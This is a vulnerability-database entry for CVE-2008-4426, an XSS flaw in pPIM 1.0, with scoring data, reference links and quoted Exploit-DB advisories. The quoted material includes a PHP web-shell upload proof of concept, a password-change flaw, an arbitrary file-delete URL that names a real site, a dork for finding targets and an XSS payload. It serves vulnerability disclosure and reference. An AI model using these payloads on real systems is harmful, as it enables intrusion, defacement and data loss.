CVE-2008-4426
Published 2008-10-03
Priority P4 · 19 · medium · 4.3 (CVSS 2.0)
AV:N/AC:M/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.60% (72.8th percentile)
Cross-site scripting (XSS) vulnerability in events.php in Phlatline's Personal Information Manager (pPIM) 1.0 allows remote attackers to inject arbitrary web script or HTML via the date parameter in a new action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phlatline | personal_information_manager | — | — |
No detection rules found.
Exploit-DB
pPIM 1.0 - Multiple Vulnerabilities
exploitdb·2009-02-25
CVE-2008-4528 pPIM 1.0 - Multiple Vulnerabilities
---
-= pPIM Multiple Vulnerabilities =-
Version Tested: pPIM 1.0
Vendor notified
Full details can also be found at http://www.lampsecurity.org/node/18
Author: Justin C. Klein Keane
Description
pPIM (http://www.phlatline.org/index.php?page=prod-ppim) is a Personal
Information Management application written in PHP that can store
contacts (including their photos), events, links, notes, send and check
email, and upload files. pPIM came to my attention recently with the
publishing on Milw0rm of exploit code designed to facilitate remote
command execution (http://www.milw0rm.com/exploits/8093). As there is a
milw0rm exploit already posted it is likely malicious users are already
exploiting pPIM. I decided to have a closer look at pPIM and, quite
frankly
Exploit-DB
pPIM 1.0 - Upload/Change Password
exploitdb·2008-08-11
CVE-2008-4528 pPIM 1.0 - Upload/Change Password
---
Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities
Script : Ppim v1.0
Download : http://scripts.ringsworld.com/organizers/ppim.zip
By Stack
Poc 1: change password
to change the password, go to this link
http://localhost/ppim/changepassword.php
write your password and confirm it
Poc 2 : upload
http://localhost/ppim/upload.php
you can upload your php shell at this link
after that, go here
http://localhost/ppim/shell.php
# milw0rm.com [2008-08-11]
Exploit-DB
pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
exploitdb·2008-08-10
CVE-2008-4528 pPIM 1.0 - Arbitrary File Delete / Cross-Site Scripting
---
##########################################################
#Author : BeyazKurt
#Contact : [email protected]
#
#Script : Ppim v1.0 [What the hell kind of script name is this :D ]
#Download : http://scripts.ringsworld.com/organizers/ppim.zip
#
# D0rk : inurl:events.php?listallevents
#
# File Delete Vulnerability: upload.php
#
# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
#
# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
#
# XSS Vulnerability: events.php
#
#[CODE]
# New Event";
# }
# ?>
#[/CODE]
#
#Exploit :
# events.php?mode=new&date=XSS CODE
# events.php?mode=new&date=">alert('XSS')
# -------------------------------
#
#
No writeups or analysis indexed.
http://secunia.com/advisories/31424
http://securityreason.com/securityalert/4348
http://www.securityfocus.com/bid/30627
https://exchange.xforce.ibmcloud.com/vulnerabilities/44388
https://www.exploit-db.com/exploits/6215
Published: 2008-10-03